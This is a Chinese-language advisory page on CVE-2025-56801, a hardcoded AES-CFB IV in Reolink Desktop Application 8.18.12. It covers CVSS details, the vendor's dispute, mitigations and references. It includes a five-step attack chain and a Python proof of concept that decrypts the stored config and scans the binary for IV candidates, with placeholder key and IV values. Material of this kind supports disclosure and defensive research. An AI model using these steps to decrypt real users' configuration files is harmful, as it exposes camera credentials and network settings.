CVE-2025-56801：Reolink桌面应用硬编码IV导致配置数据可解密

漏洞信息

漏洞编号

CVE-2025-56801

漏洞类型

硬编码凭证/加密缺陷

CVSS评分

5.1 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Reolink Desktop Application

漏洞概述

CVE-2025-56801是Reolink桌面应用（Reolink Desktop Application）8.18.12版本中存在的一个加密安全缺陷。该漏洞源于应用在其AES-CFB加密实现中使用了硬编码的初始化向量（Initialization Vector, IV）。初始化向量是分组密码模式中用于确保相同明文加密后产生不同密文的关键参数，当IV被硬编码在应用程序中时，攻击者可以预先获知该值，从而大幅降低加密强度，使得加密的配置数据可以被可靠地解密。

该漏洞的CVSS 3.1评分为5.1分，属于中危级别。攻击向量为本地（AV:L），攻击者无需认证（PR:N）和用户交互（UI:N）即可实施攻击。成功利用该漏洞后，攻击者可以读取应用程序存储的加密配置数据，可能导致用户隐私信息（如摄像头凭证、网络配置等）泄露。需要注意的是，该漏洞的影响范围限于本地环境，攻击者需要事先获得对运行该应用的系统的访问权限。

供应商对漏洞报告存在异议，其立场是相关材料并非硬编码，而是在每次安装应用时随机生成的。这一争议反映了安全研究者和厂商在加密实现安全性评估上的不同视角，但无论如何，使用硬编码IV确实会降低加密方案的整体安全性。

技术细节

该漏洞的核心技术问题在于AES-CFB（Cipher Feedback）加密模式中初始化向量（IV）的使用方式。AES-CFB是一种将分组密码转换为流密码的工作模式，其中IV与密钥共同决定了加密流的初始状态。

在密码学最佳实践中，IV应当满足以下要求：
1. 每次加密操作使用唯一的IV（随机生成）
2. IV不需要保密，但必须不可预测
3. 同一密钥不应重复使用相同的IV

在Reolink Desktop Application 8.18.12中，开发者将IV硬编码在应用程序代码中，这意味着：
1. 所有安装该应用的实例使用相同的IV值
2. 攻击者可以通过反编译应用程序轻松获取该IV值
3. 拥有本地访问权限的攻击者可以结合已知IV对存储的加密配置数据进行解密

攻击利用方式如下：
1. 攻击者获取目标系统的本地访问权限
2. 通过反编译Reolink Desktop Application提取硬编码的IV值
3. 定位应用程序存储的加密配置文件
4. 使用提取的IV和已知的加密算法（AES-CFB）对配置数据进行解密
5. 获取明文配置信息，可能包括摄像头登录凭证、IP地址、端口等敏感信息

供应商声称IV是在每次安装时随机生成的，如果属实，则该漏洞的影响将大大降低。但安全研究者的报告表明，在实际分析中发现了可重复的硬编码值，这可能意味着随机生成机制存在问题或仅在特定条件下生效。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要首先获得运行Reolink Desktop Application的系统的本地访问权限，可以通过物理访问、恶意软件或已存在的系统漏洞实现。

STEP 2

步骤2：提取硬编码IV

通过反编译或字符串分析Reolink Desktop Application二进制文件，提取其中硬编码的AES-CFB初始化向量（IV）值。

STEP 3

步骤3：定位加密配置文件

在应用安装目录或用户配置目录下找到加密存储的配置文件，通常位于AppData或Application Data目录中。

STEP 4

步骤4：解密配置数据

使用提取的硬编码IV和已知的AES-CFB算法对加密配置文件进行解密，获取明文配置信息。

STEP 5

步骤5：利用泄露信息

从解密后的配置中提取摄像头凭证、网络设置等敏感信息，可能用于进一步攻击Reolink摄像头设备或网络。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-56801 PoC - Reolink Desktop Application AES-CFB Hardcoded IV
# This PoC demonstrates how to decrypt configuration data using the hardcoded IV

from Crypto.Cipher import AES
import os
import json

def decrypt_reolink_config(encrypted_file_path, output_path):
    """
    Decrypt Reolink Desktop Application configuration file
    using the hardcoded IV discovered in version 8.18.12
    """
    # The hardcoded IV extracted from the Reolink Desktop Application binary
    # This value is embedded in the application's encryption module
    HARDCODED_IV = b'\x00' * 16  # Placeholder - actual IV extracted from binary
    
    # Key derivation or extraction would be needed
    # In practice, the key may also be derivable from the application
    key = b'\x00' * 32  # AES-256 key placeholder
    
    try:
        with open(encrypted_file_path, 'rb') as f:
            encrypted_data = f.read()
        
        # Create AES-CFB cipher with hardcoded IV
        cipher = AES.new(key, AES.MODE_CFB, iv=HARDCODED_IV, segment_size=128)
        
        # Decrypt the configuration data
        decrypted_data = cipher.decrypt(encrypted_data)
        
        # Save decrypted configuration
        with open(output_path, 'wb') as f:
            f.write(decrypted_data)
        
        print(f"[+] Configuration successfully decrypted to {output_path}")
        return decrypted_data
    
    except Exception as e:
        print(f"[-] Decryption failed: {e}")
        return None

def extract_iv_from_binary(binary_path):
    """
    Extract the hardcoded IV from the Reolink application binary
    by searching for AES initialization patterns
    """
    iv_patterns = []
    try:
        with open(binary_path, 'rb') as f:
            data = f.read()
        
        # Search for potential 16-byte IV candidates
        # AES block size is 16 bytes
        for i in range(len(data) - 16):
            candidate = data[i:i+16]
            # Check if it looks like a potential IV (heuristic)
            if all(b != 0 for b in candidate) and len(set(candidate)) > 4:
                iv_patterns.append(candidate.hex())
        
        print(f"[+] Found {len(iv_patterns)} potential IV candidates")
        return iv_patterns[:10]  # Return top candidates
    
    except Exception as e:
        print(f"[-] Binary analysis failed: {e}")
        return []

if __name__ == "__main__":
    # Example usage
    print("CVE-2025-56801 PoC - Reolink Desktop Application")
    print("=" * 50)
    
    # Step 1: Extract IV from application binary
    # binary_path = "/path/to/Reolink.exe"
    # iv_candidates = extract_iv_from_binary(binary_path)
    
    # Step 2: Decrypt configuration
    # decrypt_reolink_config("config.enc", "config_decrypted.json")
    
    print("[*] See https://github.com/shinyColumn/CVE-2025-56801 for full details")

影响范围

Reolink Desktop Application 8.18.12

防御指南

临时缓解措施

在等待官方修复期间，建议用户：1）限制对运行Reolink Desktop Application系统的本地访问权限；2）监控系统配置目录的异常访问行为；3）使用强密码保护用户账户，防止未授权本地访问；4）考虑使用全盘加密保护敏感数据；5）监控应用程序目录的完整性，检测是否有未授权的修改。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-56801
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-56801
3 Details https://www.cvedetails.com/cve/CVE-2025-56801/
4 VulDB https://vuldb.com/cve/CVE-2025-56801
5 Link https://github.com/shinyColumn/CVE-2025-56801
6 Link https://shinycolumn.notion.site/reolink-aes-iv